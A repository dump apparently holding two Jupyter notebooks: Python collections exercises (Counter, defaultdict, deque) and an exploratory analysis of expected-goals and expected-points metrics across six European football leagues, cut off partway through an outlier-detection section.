155 |    "metadata": {},
156 |    "outputs": [
157 |     {
158 |      "data": {
159 |       "text/plain": [
160 |        "[('the', 786),\n",
161 |        " ('I', 622),\n",
162 |        " ('and', 591),\n",
163 |        " ('of', 446),\n",
164 |        " ('to', 429),\n",
165 |        " ('my', 402),\n",
166 |        " ('you', 400),\n",
167 |        " ('a', 353),\n",
168 |        " ('in', 266),\n",
169 |        " ('not', 265),\n",
170 |        " ('that', 249),\n",
171 |        " ('KING', 243),\n",
172 |        " ('LEAR', 236),\n",
173 |        " ('me', 227),\n",
174 |        " ('your', 205),\n",
175 |        " ('him', 197),\n",
176 |        " ('have', 193),\n",
177 |        " ('his', 193),\n",
178 |        " ('is', 192),\n",
179 |        " ('this', 185)]"
180 |       ]
181 |      },
182 |      "execution_count": 4,
183 |      "metadata": {},
184 |      "output_type": "execute_result"
185 |     }
186 |    ],
187 |    "source": [
188 |     "from collections import Counter\n",
189 |     "import string\n",
190 |     "\n",
191 |     "with open('data/kinglear.txt', 'r') as f:\n",
192 |     "    count_words = Counter()\n",
193 |     "    for line in f:\n",
194 |     "        line = line.translate(str.maketrans('', '', string.punctuation))\n",
195 |     "        words = line.split()\n",
196 |     "        words_per_line = Counter(words)\n",
197 |     "        count_words += words_per_line\n",
198 |     "\n",
199 |     "count_words.most_common(20)"
200 |    ]
201 |   },
202 |   {
203 |    "cell_type": "code",
204 |    "execution_count": 11,
205 |    "metadata": {},
206 |    "outputs": [
207 |     {
208 |      "data": {
209 |       "text/plain": [
210 |        "[(15, 1), (20, 2)]"
211 |       ]
212 |      },
213 |      "execution_count": 11,
214 |      "metadata": {},
215 |      "output_type": "execute_result"
216 |     }
217 |    ],
218 |    "source": [
219 |     "shopping_cart = [\n",
220 |     "    ('t-shirt', 15, 1),\n",
221 |     "    ('pants', 50, 1),\n",
222 |     "    ('t-shirt', 20, 2),\n",
223 |     "    ('socks', 10, 1),\n",
224 |     "    ('jacket', 100, 1),\n",
225 |     "    ('socks', 5, 1)\n",
226 |     "]\n",
227 |     "\n",
228 |     "from collections import defaultdict\n",
229 |     "total_clothes = defaultdict(list)\n",
230 |     "for item, price, quantity in shopping_cart:\n",
231 |     "    total_clothes[item].append((price, quantity))\n",
232 |     "\n",
233 |     "total_clothes['t-shirt']\n",
234 |     "# >>> [(15, 1), (20, 2)]\n",
235 |     "\n",
236 |     "\n",
237 |     "# total_clothes = {}\n",
238 |     "# for item, price, quantity in shopping_cart:\n",
239 |     "#     total_clothes[item].append((price, quantity))\n",
240 |     "# >>> KeyError: 't-shirt'"
241 |    ]
242 |   },
243 |   {
244 |    "cell_type": "code",
245 |    "execution_count": 15,
246 |    "metadata": {},
247 |    "outputs": [
248 |     {
249 |      "data": {
250 |       "text/plain": [
251 |        "defaultdict(int, {'t-shirt': 55, 'pants': 50, 'socks': 15, 'jacket': 100})"
252 |       ]
253 |      },
254 |      "execution_count": 15,
255 |      "metadata": {},
256 |      "output_type": "execute_result"
257 |     }
258 |    ],
259 |    "source": [
260 |     "shopping_cart = [\n",
261 |     "    ('t-shirt', 15, 1),\n",
262 |     "    ('pants', 50, 1),\n",
263 |     "    ('t-shirt', 20, 2),\n",
264 |     "    ('socks', 10, 1),\n",
265 |     "    ('jacket', 100, 1),\n",
266 |     "    ('socks', 5, 1)\n",
267 |     "]\n",
268 |     "\n",
269 |     "from collections import defaultdict\n",
270 |     "total_clothes = defaultdict(int)\n",
271 |     "for item, price, quantity in shopping_cart:\n",
272 |     "    total_clothes[item] += price*quantity\n",
273 |     "\n",
274 |     "total_clothes"
275 |    ]
276 |   },
277 |   {
278 |    "cell_type": "code",
279 |    "execution_count": 16,
280 |    "metadata": {},
281 |    "outputs": [
282 |     {
283 |      "data": {
284 |       "text/plain": [
285 |        "[('jacket', 100), ('t-shirt', 55), ('pants', 50)]"
286 |       ]
287 |      },
288 |      "execution_count": 16,
289 |      "metadata": {},
290 |      "output_type": "execute_result"
291 |     }
292 |    ],
293 |    "source": [
294 |     "shopping_cart = [\n",
295 |     "    ('t-shirt', 15, 1),\n",
296 |     "    ('pants', 50, 1),\n",
297 |     "    ('t-shirt', 20, 2),\n",
298 |     "    ('socks', 10, 1),\n",
299 |     "    ('jacket', 100, 1),\n",
300 |     "    ('socks', 5, 1)\n",
301 |     "]\n",
302 |     "\n",
303 |     "from collections import Counter\n",
304 |     "total_clothes = Counter()\n",
305 |     "for item, price, quantity in shopping_cart:\n",
306 |     "    total_clothes[item] += price*quantity\n",
307 |     "\n",
308 |     "total_clothes.most_common(3)"
309 |    ]
310 |   },
311 |   {
312 |    "cell_type": "code",
313 |    "execution_count": 18,
314 |    "metadata": {},
315 |    "outputs": [
316 |     {
317 |      "name": "stdout",
318 |      "output_type": "stream",
319 |      "text": [
320 |       "Last game result: 1\n",
321 |       "Previous 5 games results: victories - 1 draws - 0 defeats - 0\n",
322 |       "Last game result: X\n",
323 |       "Previous 5 games results: victories - 1 draws - 1 defeats - 0\n",
324 |       "Last game result: 1\n",
325 |       "Previous 5 games results: victories - 2 draws - 1 defeats - 0\n",
326 |       "Last game result: 2\n",
327 |       "Previous 5 games results: victories - 1 draws - 1 defeats - 1\n",
328 |       "Last game result: X\n",
329 |       "Previous 5 games results: victories - 1 draws - 1 defeats - 1\n",
330 |       "Last game result: 1\n",
331 |       "Previous 5 games results: victories - 1 draws - 1 defeats - 1\n",
332 |       "Last game result: 1\n",
333 |       "Previous 5 games results: victories - 2 draws - 1 defeats - 0\n",
334 |       "Last game result: 1\n",
335 |       "Previous 5 games results: victories - 3 draws - 0 defeats - 0\n",
336 |       "Last game result: 1\n",
337 |       "Previous 5 games results: victories - 3 draws - 0 defeats - 0\n",
338 |       "Last game result: X\n",
339 |       "Previous 5 games results: victories - 2 draws - 1 defeats - 0\n",
340 |       "Last game result: 1\n",
341 |       "Previous 5 games results: victories - 2 draws - 1 defeats - 0\n"
342 |      ]
343 |     }
344 |    ],
345 |    "source": [
346 |     "from collections import deque, Counter\n",
347 |     "import csv\n",
348 |     "\n",
349 |     "history = deque(maxlen=3)\n",
350 |     "with open('data/results.csv', 'r') as f:\n",
351 |     "    lines = csv.reader(f)\n",
352 |     "    headers = next(lines)\n",
353 |     "    for line in lines:\n",
354 |     "        history.append(line)\n",
355 |     "        print('Last game result:', line[-1])\n",
356 |     "        last_results = Counter()\n",
357 |     "        for result in history:\n",
358 |     "            last_results[result[-1]] += 1\n",
359 |     "\n",
360 |     "        print('Previous 5 games results: victories -', last_results['1'], 'draws -', last_results['X'], 'defeats -', last_results['2'])\n"
361 |    ]
362 |   }
363 |  ],
364 |  "metadata": {
365 |   "kernelspec": {
366 |    "display_name": "Python 3.8.10 ('venv': venv)",
367 |    "language": "python",
368 |    "name": "python3"
369 |   },
370 |   "language_info": {
371 |    "codemirror_mode": {
372 |     "name": "ipython",
373 |     "version": 3
374 |    },
375 |    "file_extension": ".py",
376 |    "mimetype": "text/x-python",
377 |    "name": "python",
378 |    "nbconvert_exporter": "python",
379 |    "pygments_lexer": "ipython3",
380 |    "version": "3.8.10"
381 |   },
382 |   "orig_nbformat": 4,
383 |   "vscode": {
384 |    "interpreter": {
385 |     "hash": "439571daf87331876600085d8386dc908c3f950474647915ed4fb6541957308b"
386 |    }
387 |   }
388 |  },
389 |  "nbformat": 4,
390 |  "nbformat_minor": 2
391 | }
392 | 


--------------------------------------------------------------------------------
/football_why_winners_win_and_losers_loose.ipynb:
--------------------------------------------------------------------------------
1 | {"cells":[{"metadata":{},"cell_type":"markdown","source":"# Exploring 5 Years of European Football"},{"metadata":{},"cell_type":"markdown","source":"# Intro\n\nIn this notebook we will explore modern metrics in football (xG, xGA and xPTS) and its' influence in sport analytics.\n\n* **Expected Goals (xG)** - measures the quality of a shot based on several variables such as assist type, shot angle and distance from goal, whether it was a headed shot and whether it was defined as a big chance.\n\n* **Expected Assits (xGA)** - measures the likelihood that a given pass will become a goal assist. It considers several factors including the type of pass, pass end-point and length of the pass.\n\n* **Expected Points (xPTS)** - measures the likelihood of a certaing game to bring points to the team.\n\nThese metrics let us look much deeper into football statistics and understand performance of players and teams in general and realize the role of luck and skill in it. Disclaimer: they are both important.\n\nThe process of data collection for this notebook is described in this Kaggle kernel: [Web Scraping Football Statistics](https://www.kaggle.com/slehkyi/web-scraping-football-statistics-2014-now)"},{"metadata":{"_uuid":"8f2839f25d086af736a60e9eeb907d3b93b6e0e5","_cell_guid":"b1076dfc-b9ad-4769-8c92-a6c4dae69d19","trusted":true},"cell_type":"code","source":"import pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport collections\nimport warnings\n\nfrom IPython.core.display import display, HTML\n\n# import plotly \nimport plotly\nimport plotly.figure_factory as ff\nimport plotly.graph_objs as go\nimport plotly.offline as py\nfrom plotly.offline import iplot, init_notebook_mode\nimport plotly.tools as tls\n\n# configure things\nwarnings.filterwarnings('ignore')\n\npd.options.display.float_format = '{:,.2f}'.format  \npd.options.display.max_columns = 999\n\npy.init_notebook_mode(connected=True)\n\n%load_ext autoreload\n%autoreload 2\n\n%matplotlib inline\nsns.set()\n\n# !pip install plotly --upgrade","execution_count":null,"outputs":[]},{"metadata":{"_cell_guid":"79c7e3d0-c299-4dcb-8224-4455121ee9b0","_uuid":"d629ff2d2480ee46fbb7e2d37f6b5fab8052498a","trusted":true},"cell_type":"code","source":"# # func to make plotly work in Collaboratory (not necessary on Kaggle)\n# def configure_plotly_browser_state():\n#   import IPython\n#   display(IPython.core.display.HTML('''\n# <script src=\"/static/components/requirejs/require.js\"></script>\n# <script>\n#   requirejs.config({\n#     paths: {\n#       base: 'static/base',\n#       plotly: 'https://cdn.plot.ly/plotly-1.5.1.min.js?noext',\n#     },\n#   });\n# </script>\n# '''))","execution_count":null,"outputs":[]},{"metadata":{},"cell_type":"markdown","source":"# Import Data and Visual EDA"},{"metadata":{"trusted":true},"cell_type":"code","source":"df = pd.read_csv('../input/understat.com.csv')\ndf = df.rename(index=int, columns={'Unnamed: 0': 'league', 'Unnamed: 1': 'year'}) \ndf.head()","execution_count":null,"outputs":[]},{"metadata":{},"cell_type":"markdown","source":"In the next visualization we will check how many teams from each league were in top 4 during last 5 years. It can give us some info about stability of top teams from different countries."},{"metadata":{"trusted":true},"cell_type":"code","source":"f = plt.figure(figsize=(25,12))\nax = f.add_subplot(2,3,1)\nplt.xticks(rotation=45)\nsns.barplot(x='team', y='pts', hue='year', data=df[(df['league'] == 'Bundesliga') & (df['position'] <= 4)], ax=ax)\nax = f.add_subplot(2,3,2)\nplt.xticks(rotation=45)\nsns.barplot(x='team', y='pts', hue='year', data=df[(df['league'] == 'EPL') & (df['position'] <= 4)], ax=ax)\nax = f.add_subplot(2,3,3)\nplt.xticks(rotation=45)\nsns.barplot(x='team', y='pts', hue='year', data=df[(df['league'] == 'La_liga') & (df['position'] <= 4)], ax=ax)\nax = f.add_subplot(2,3,4)\nplt.xticks(rotation=45)\nsns.barplot(x='team', y='pts', hue='year', data=df[(df['league'] == 'Serie_A') & (df['position'] <= 4)], ax=ax)\nax = f.add_subplot(2,3,5)\nplt.xticks(rotation=45)\nsns.barplot(x='team', y='pts', hue='year', data=df[(df['league'] == 'Ligue_1') & (df['position'] <= 4)], ax=ax)\nax = f.add_subplot(2,3,6)\nplt.xticks(rotation=45)\nsns.barplot(x='team', y='pts', hue='year', data=df[(df['league'] == 'RFPL') & (df['position'] <= 4)], ax=ax)","execution_count":null,"outputs":[]},{"metadata":{},"cell_type":"markdown","source":"As we can see from these bar charts, there are teams that in last 5 years were in top 4 only once, which means it is not something common, which means if we dig deeper, we can find that there is a factor of luck that might have played in favour to these teams. It's just a theory, so let's look closer to those outliers.\n\nThe teams that were in top 4 only once during last 5 seasons are:\n\n*  Wolfsburg (2014) and Schalke 04 (2017) from Bundesliga\n*  Leicester (2015) from EPL\n*  Villareal (2015) and Sevilla (2016) from La Liga\n*  Lazio (2014) and Fiorentina (2014) from Serie A\n*  Lille (2018) and Saint-Etienne (2018) from Ligue 1\n*  FC Rostov (2015) and Dinamo Moscow (2014) from RFPL\n\nLet's save these teams."},{"metadata":{"trusted":true},"cell_type":"code","source":"# Removing unnecessary for our analysis columns \ndf_xg = df[['league', 'year', 'position', 'team', 'scored', 'xG', 'xG_diff', 'missed', 'xGA', 'xGA_diff', 'pts', 'xpts', 'xpts_diff']]\n\noutlier_teams = ['Wolfsburg', 'Schalke 04', 'Leicester', 'Villareal', 'Sevilla', 'Lazio', 'Fiorentina', 'Lille', 'Saint-Etienne', 'FC Rostov', 'Dinamo Moscow']","execution_count":null,"outputs":[]},{"metadata":{"trusted":true},"cell_type":"code","source":"# Checking if getting the first place requires fenomenal execution\nfirst_place = df_xg[df_xg['position'] == 1]\n\n# Get list of leagues\nleagues = df['league'].drop_duplicates()\nleagues = leagues.tolist()\n\n# Get list of years\nyears = df['year'].drop_duplicates()\nyears = years.tolist()","execution_count":null,"outputs":[]},{"metadata":{},"cell_type":"markdown","source":"# Understanding How Winners Win"},{"metadata":{},"cell_type":"markdown","source":"In this section we will try to find some patterns that can help us understand what are some of the ingredients of the victory soup :D. Starting with Bundesliga."},{"metadata":{},"cell_type":"markdown","source":"## Bundesliga"},{"metadata":{"trusted":true},"cell_type":"code","source":"first_place[first_place['league'] == 'Bundesliga']","execution_count":null,"outputs":[]},{"metadata":{"trusted":true},"cell_type":"code","source":"pts = go.Bar(x = years, y = first_place['pts'][first_place['league'] == 'Bundesliga'], name = 'PTS')\nxpts = go.Bar(x = years, y = first_place['xpts'][first_place['league'] == 'Bundesliga'], name = 'Expected PTS')\n\ndata = [pts, xpts]\n\nlayout = go.Layout(\n    barmode='group',\n    title=\"Comparing Actual and Expected Points for Winner Team in Bundesliga\",\n    xaxis={'title': 'Year'},\n    yaxis={'title': \"Points\",\n    }\n)\n\nfig = go.Figure(data=data, layout=layout)\npy.iplot(fig)","execution_count":null,"outputs":[]},{"metadata":{},"cell_type":"markdown","source":"By looking at the table and barchart we see that Bayern every year got more points that they should have, they scored more than expected and missed less than expected (except for 2018, which didn't break their plan of winning the season, but it gives some hints that Bayern played worse this year, although the competitors didn't take advantage of it). "},{"metadata":{"trusted":true},"cell_type":"code","source":"# and from this table we see that Bayern dominates here totally, even when they do not play well\ndf_xg[(df_xg['position'] <= 2) & (df_xg['league'] == 'Bundesliga')].sort_values(by=['year','xpts'], ascending=False)","execution_count":null,"outputs":[]},{"metadata":{},"cell_type":"markdown","source":"## La Liga"},{"metadata":{"trusted":true},"cell_type":"code","source":"first_place[first_place['league'] == 'La_liga']","execution_count":null,"outputs":[]},{"metadata":{"trusted":true},"cell_type":"code","source":"pts = go.Bar(x = years, y = first_place['pts'][first_place['league'] == 'La_liga'], name = 'PTS')\nxpts = go.Bar(x = years, y = first_place['xpts'][first_place['league'] == 'La_liga'], name = 'Expected PTS')\n\ndata = [pts, xpts]\n\nlayout = go.Layout(\n    barmode='group',\n    title=\"Comparing Actual and Expected Points for Winner Team in La Liga\",\n    xaxis={'title': 'Year'},\n    yaxis={'title': \"Points\",\n    }\n)\n\nfig = go.Figure(data=data, layout=layout)\npy.iplot(fig)","execution_count":null,"outputs":[]},{"metadata":{},"cell_type":"markdown","source":"As we can see from the chart above that in 2014 and 2015 Barcelona was creating enough moments to win the title and do not rely on personal skills or luck, from these numbers we can actually say that THE Team was playing there.\n\nIn 2016 there were lots of competition between Madrid and Barcelona and in the end Madrid got luckier / had more guts in one particular game (or Barcelona got unlucky / didn't have balls) and it was the cost of the title. I am sure that if we dig deeper that season we can find that particular match.\n\nIn 2017 and 2018 Barcelona's success was mostly tributed to actions of Lionel Messi who was scoring or making assits in situations where normal players wouldn't do that. What led to such a jump in xPTS difference. What makes me think (having the context that Real Madrid is very active on transfer market this season) can end up bad. Just subjective opinion based on numbers and watching Barcelona games. Really hope I am wrong."},{"metadata":{"trusted":true},"cell_type":"code","source":"# comparing with runner-up\ndf_xg[(df_xg['position'] <= 2) & (df_xg['league'] == 'La_liga')].sort_values(by=['year','xpts'], ascending=False)","execution_count":null,"outputs":[]},{"metadata":{},"cell_type":"markdown","source":"## EPL"},{"metadata":{"trusted":true},"cell_type":"code","source":"first_place[first_place['league'] == 'EPL']","execution_count":null,"outputs":[]},{"metadata":{"trusted":true},"cell_type":"code","source":"pts = go.Bar(x = years, y = first_place['pts'][first_place['league'] == 'EPL'], name = 'PTS')\nxpts = go.Bar(x = years, y = first_place['xpts'][first_place['league'] == 'EPL'], name = 'Expected PTS')\n\ndata = [pts, xpts]\n\nlayout = go.Layout(\n    barmode='group',\n    title=\"Comparing Actual and Expected Points for Winner Team in EPL\",\n    xaxis={'title': 'Year'},\n    yaxis={'title': \"Points\",\n    }\n)\n\nfig = go.Figure(data=data, layout=layout)\npy.iplot(fig)","execution_count":null,"outputs":[]},{"metadata":{},"cell_type":"markdown","source":"In EPL we see the clear trend that tells you: \"To win you have to be better than statistics\". Interesting case here is Leicester story of victory in 2015: they got 12 points more than they should've and at the same time Arsenal got 6 points less of expected! This is why we love football, because such unexplicable things happen. I am not telling is total luck, but it played its' role here.\n\nAnother interesting thing is Manchester City of 2018 - they are super stable! They scored just one goal more than expected, missed 2 less and got 7 additional points, while Liverpool fought really well, had little bit more luck on their side, but couldn't win despite being 13 points ahead of their expected.\n\nPep is finishing building the machine of destruction. Man City creates and converts their moments based on skill and do not rely on luck - it makes them very dangerous in the next season."},{"metadata":{"trusted":true},"cell_type":"code","source":"# comparing with runner-ups\ndf_xg[(df_xg['position'] <= 2) & (df_xg['league'] == 'EPL')].sort_values(by=['year','xpts'], ascending=False)","execution_count":null,"outputs":[]},{"metadata":{},"cell_type":"markdown","source":"## Ligue 1"},{"metadata":{"trusted":true},"cell_type":"code","source":"first_place[first_place['league'] == 'Ligue_1']","execution_count":null,"outputs":[]},{"metadata":{"trusted":true},"cell_type":"code","source":"pts = go.Bar(x = years, y = first_place['pts'][first_place['league'] == 'Ligue_1'], name = 'PTS')\nxpts = go.Bar(x = years, y = first_place['xpts'][first_place['league'] == 'Ligue_1'], name = 'Expected PTS')\n\ndata = [pts, xpts]\n\nlayout = go.Layout(\n    barmode='group',\n    title=\"Comparing Actual and Expected Points for Winner Team in Ligue 1\",\n    xaxis={'title': 'Year'},\n    yaxis={'title': \"Points\",\n    }\n)\n\nfig = go.Figure(data=data, layout=layout)\npy.iplot(fig)","execution_count":null,"outputs":[]},{"metadata":{},"cell_type":"markdown","source":"In French Ligue 1 we continue to see the trend \"to win you have to execute 110%, because 100% is not enough\". Here Paris Saint Germain dominates totally. Only in 2016 we get an outlier in the face of Monaco that scored 30 goals more than expected!!! and got almost 17 points more than expected! Luck? Quite a good piece of it. PSG was good that year, but Monaco was extraordinary. Again, we cannot claim it's pure luck or pure skill, but a perfect combination of both in right place and time."},{"metadata":{"trusted":true},"cell_type":"code","source":"# comparing with runner-ups\ndf_xg[(df_xg['position'] <= 2) & (df_xg['league'] == 'Ligue_1')].sort_values(by=['year','xpts'], ascending=False)","execution_count":null,"outputs":[]},{"metadata":{},"cell_type":"markdown","source":"## Serie A"},{"metadata":{"trusted":true},"cell_type":"code","source":"first_place[first_place['league'] == 'Serie_A']","execution_count":null,"outputs":[]},{"metadata":{"trusted":true},"cell_type":"code","source":"pts = go.Bar(x = years, y = first_place['pts'][first_place['league'] == 'Serie_A'], name = 'PTS')\nxpts = go.Bar(x = years, y = first_place['xpts'][first_place['league'] == 'Serie_A'], name = 'Expecetd PTS')\n\ndata = [pts, xpts]\n\nlayout = go.Layout(\n    barmode='group',\n    title=\"Comparing Actual and Expected Points for Winner Team in Serie A\",\n    xaxis={'title': 'Year'},\n    yaxis={'title': \"Points\",\n    }\n)\n\nfig = go.Figure(data=data, layout=layout)\npy.iplot(fig)","execution_count":null,"outputs":[]},{"metadata":{},"cell_type":"markdown","source":"In Italian Serie A Juventus is dominating 8 years in a row although cannot show any major success in Champions League. I think by checking this chart and numbers we can understand that Juve doesn't have strong enough competiton inside the country and gets lots of \"lucky\" points, which again derives from multiple factors and we can see that Napoli outperformed Juventus by xPTS twice, but it is a real life and in, for example 2017, Juve was crazy and scored additional 26 goals (or created goals from nowhere), while Napoli missed 3 more than expected (due to error of goalkeeper or maybe excelence of some team in 1 or 2 particular matches). As with the situation in La Liga when Real Madrid became a champion I am sure we can find 1 or 2 games that was key that year.\n\nDetails matter in football. You see, one error here, one woodwork there and you've lost the title."},{"metadata":{"trusted":true},"cell_type":"code","source":"# comparing to runner-ups\ndf_xg[(df_xg['position'] <= 2) & (df_xg['league'] == 'Serie_A')].sort_values(by=['year','xpts'], ascending=False)","execution_count":null,"outputs":[]},{"metadata":{},"cell_type":"markdown","source":"## RFPL"},{"metadata":{"trusted":true},"cell_type":"code","source":"first_place[first_place['league'] == 'RFPL']","execution_count":null,"outputs":[]},{"metadata":{"trusted":true},"cell_type":"code","source":"pts = go.Bar(x = years, y = first_place['pts'][first_place['league'] == 'RFPL'], name = 'PTS')\nxpts = go.Bar(x = years, y = first_place['xpts'][first_place['league'] == 'RFPL'], name = 'Expected PTS')\n\ndata = [pts, xpts]\n\nlayout = go.Layout(\n    barmode='group',\n    title=\"Comparing Actual and Expected Points for Winner Team in RFPL\",\n    xaxis={'title': 'Year'},\n    yaxis={'title': \"Points\",\n    }\n)\n\nfig = go.Figure(data=data, layout=layout)\npy.iplot(fig)","execution_count":null,"outputs":[]},{"metadata":{},"cell_type":"markdown","source":"I do not follow Russian Premier League, so just by coldly looking at data we see the same pattern as scoring more than you deserve and also intersting situation with CSKA Moscow from 2015 to 2017. During these years these guys were good, but converted their advantages only once, the others two - if you do not convert, you get punished or your main competitor just converts better. \n\nThere is no justice in football :D. Although, I believe with VAR the numbers will become more stable in next seasons. Because one of the reasons of those additional goals and points are errors of arbiters."},{"metadata":{"trusted":true},"cell_type":"code","source":"# comparing to runner-ups\ndf_xg[(df_xg['position'] <= 2) & (df_xg['league'] == 'RFPL')].sort_values(by=['year','xpts'], ascending=False)","execution_count":null,"outputs":[]},{"metadata":{},"cell_type":"markdown","source":"# Statistical Overview"},{"metadata":{},"cell_type":"markdown","source":"As there are 6 leagues with different teams and stats, I decided to focus on one in the beginning to test different approaches and then replicate the final analysis model on other 5. And as I watch mostly La Liga I will start with this competiton as I know the most about it."},{"metadata":{"trusted":true},"cell_type":"code","source":"# Creating separate DataFrames per each league\nlaliga = df_xg[df_xg['league'] == 'La_liga']\nlaliga.reset_index(inplace=True)\nepl = df_xg[df_xg['league'] == 'EPL']\nepl.reset_index(inplace=True)\nbundesliga = df_xg[df_xg['league'] == 'Bundesliga']\nbundesliga.reset_index(inplace=True)\nseriea = df_xg[df_xg['league'] == 'Serie_A']\nseriea.reset_index(inplace=True)\nligue1 = df_xg[df_xg['league'] == 'Ligue_1']\nligue1.reset_index(inplace=True)\nrfpl = df_xg[df_xg['league'] == 'RFPL']\nrfpl.reset_index(inplace=True)","execution_count":null,"outputs":[]},{"metadata":{"trusted":true},"cell_type":"code","source":"laliga.describe()","execution_count":null,"outputs":[]},{"metadata":{},"cell_type":"markdown","source":"Using data from describe() method we can get some interesting insights about every league. Below is the function that helps to get those insights. "},{"metadata":{"trusted":true},"cell_type":"code","source":"def print_records_antirecords(df):\n  print('Presenting some records and antirecords: \\n')\n  for col in df.describe().columns:\n    if col not in ['index', 'year', 'position']:\n      team_min = df['team'].loc[df[col] == df.describe().loc['min',col]].values[0]\n      year_min = df['year'].loc[df[col] == df.describe().loc['min',col]].values[0]\n      team_max = df['team'].loc[df[col] == df.describe().loc['max',col]].values[0]\n      year_max = df['year'].loc[df[col] == df.describe().loc['max',col]].values[0]\n      val_min = df.describe().loc['min',col]\n      val_max = df.describe().loc['max',col]\n      print('The lowest value of {0} had {1} in {2} and it is equal to {3:.2f}'.format(col.upper(), team_min, year_min, val_min))\n      print('The highest value of {0} had {1} in {2} and it is equal to {3:.2f}'.format(col.upper(), team_max, year_max, val_max))\n      print('='*100)\n      \n# replace laliga with any league you want\nprint_records_antirecords(laliga)","execution_count":null,"outputs":[]},{"metadata":{"trusted":true},"cell_type":"code","source":"trace0 = go.Scatter(\n    x = laliga['position'][laliga['year'] == 2014], \n    y = laliga['xG_diff'][laliga['year'] == 2014],\n    name = '2014',\n    mode = 'lines+markers'\n)\n\ntrace1 = go.Scatter(\n    x = laliga['position'][laliga['year'] == 2015], \n    y = laliga['xG_diff'][laliga['year'] == 2015],\n    name='2015',\n    mode = 'lines+markers'\n)\n\ntrace2 = go.Scatter(\n    x = laliga['position'][laliga['year'] == 2016], \n    y = laliga['xG_diff'][laliga['year'] == 2016],\n    name='2016',\n    mode = 'lines+markers'\n)\n\ntrace3 = go.Scatter(\n    x = laliga['position'][laliga['year'] == 2017], \n    y = laliga['xG_diff'][laliga['year'] == 2017],\n    name='2017',\n    mode = 'lines+markers'\n)\n\ntrace4 = go.Scatter(\n    x = laliga['position'][laliga['year'] == 2018], \n    y = laliga['xG_diff'][laliga['year'] == 2018],\n    name='2018',\n    mode = 'lines+markers'\n)\n\ndata = [trace0, trace1, trace2, trace3, trace4]\n\nlayout = go.Layout(\n    title=\"Comparing xG gap between positions\",\n    xaxis={'title': 'Year'},\n    yaxis={'title': \"xG difference\",\n    }\n)\n\nfig = go.Figure(data=data, layout=layout)\npy.iplot(fig)","execution_count":null,"outputs":[]},{"metadata":{"trusted":true},"cell_type":"code","source":"trace0 = go.Scatter(\n    x = laliga['position'][laliga['year'] == 2014], \n    y = laliga['xGA_diff'][laliga['year'] == 2014],\n    name = '2014',\n    mode = 'lines+markers'\n)\n\ntrace1 = go.Scatter(\n    x = laliga['position'][laliga['year'] == 2015], \n    y = laliga['xGA_diff'][laliga['year'] == 2015],\n    name='2015',\n    mode = 'lines+markers'\n)\n\ntrace2 = go.Scatter(\n    x = laliga['position'][laliga['year'] == 2016], \n    y = laliga['xGA_diff'][laliga['year'] == 2016],\n    name='2016',\n    mode = 'lines+markers'\n)\n\ntrace3 = go.Scatter(\n    x = laliga['position'][laliga['year'] == 2017], \n    y = laliga['xGA_diff'][laliga['year'] == 2017],\n    name='2017',\n    mode = 'lines+markers'\n)\n\ntrace4 = go.Scatter(\n    x = laliga['position'][laliga['year'] == 2018], \n    y = laliga['xGA_diff'][laliga['year'] == 2018],\n    name='2018',\n    mode = 'lines+markers'\n)\n\ndata = [trace0, trace1, trace2, trace3, trace4]\n\nlayout = go.Layout(\n    title=\"Comparing xGA gap between positions\",\n    xaxis={'title': 'Year'},\n    yaxis={'title': \"xGA difference\",\n    }\n)\n\nfig = go.Figure(data=data, layout=layout)\npy.iplot(fig)","execution_count":null,"outputs":[]},{"metadata":{"trusted":true},"cell_type":"code","source":"trace0 = go.Scatter(\n    x = laliga['position'][laliga['year'] == 2014], \n    y = laliga['xpts_diff'][laliga['year'] == 2014],\n    name = '2014',\n    mode = 'lines+markers'\n)\n\ntrace1 = go.Scatter(\n    x = laliga['position'][laliga['year'] == 2015], \n    y = laliga['xpts_diff'][laliga['year'] == 2015],\n    name='2015',\n    mode = 'lines+markers'\n)\n\ntrace2 = go.Scatter(\n    x = laliga['position'][laliga['year'] == 2016], \n    y = laliga['xpts_diff'][laliga['year'] == 2016],\n    name='2016',\n    mode = 'lines+markers'\n)\n\ntrace3 = go.Scatter(\n    x = laliga['position'][laliga['year'] == 2017], \n    y = laliga['xpts_diff'][laliga['year'] == 2017],\n    name='2017',\n    mode = 'lines+markers'\n)\n\ntrace4 = go.Scatter(\n    x = laliga['position'][laliga['year'] == 2018], \n    y = laliga['xpts_diff'][laliga['year'] == 2018],\n    name='2018',\n    mode = 'lines+markers'\n)\n\ndata = [trace0, trace1, trace2, trace3, trace4]\n\nlayout = go.Layout(\n    title=\"Comparing xPTS gap between positions\",\n    xaxis={'title': 'Position'},\n    yaxis={'title': \"xPTS difference\",\n    }\n)\n\nfig = go.Figure(data=data, layout=layout)\npy.iplot(fig)","execution_count":null,"outputs":[]},{"metadata":{},"cell_type":"markdown","source":"From the charts above we can clearly see that top teams score more, concede less and get more points than expected. That's why these teams are top teams. And totally opposite situation with outsiders. The teams from the middleplay average. Totally logical, no huge insights here."},{"metadata":{"trusted":true},"cell_type":"code","source":"# Check mean differences\ndef get_diff_means(df):  \n  dm = df.groupby('year')[['xG_diff', 'xGA_diff', 'xpts_diff']].mean()\n  \n  return dm\n\nmeans = get_diff_means(laliga)\nmeans","execution_count":null,"outputs":[]},{"metadata":{"trusted":true},"cell_type":"code","source":"# Check median differences\ndef get_diff_medians(df):  \n  dm = df.groupby('year')[['xG_diff', 'xGA_diff', 'xpts_diff']].median()\n  \n  return dm\n\nmedians = get_diff_medians(laliga)\nmedians","execution_count":null,"outputs":[]},{"metadata":{},"cell_type":"markdown","source":"# Outliers Detection"},{"metadata":{},"cell_type":"markdown","source":"## Z-Score"},{"metadata":{},"cell_type":"markdown","source":"Z-Score is the number of standard deviations from the mean a data point is. We can use it to find outliers in our dataset by assuming that |z-score| > 3 is an outlier."},{"metadata":{"trusted":true},"cell_type":"code","source":"# Getting outliers for xG using zscore\nfrom scipy.stats import zscore\n# laliga[(np.abs(zscore(laliga[['xG_diff']])) > 2.0).all(axis=1)]\ndf_xg[(np.abs(zscore(df_xg[['xG_diff']])) > 3.0).all(axis=1)]","execution_count":null,"outputs":[]},{"metadata":{"trusted":true},"cell_type":"code","source":"# outliers for xGA\n# laliga[(np.abs(zscore(laliga[['xGA_diff']])) > 2.0).all(axis=1)]\ndf_xg[(np.abs(zscore(df_xg[['xGA_diff']])) > 3.0).all(axis=1)]","execution_count":null,"outputs":[]},{"metadata":{"trusted":true},"cell_type":"code","source":"# Outliers for xPTS\n# laliga[(np.abs(zscore(laliga[['xpts_diff']])) > 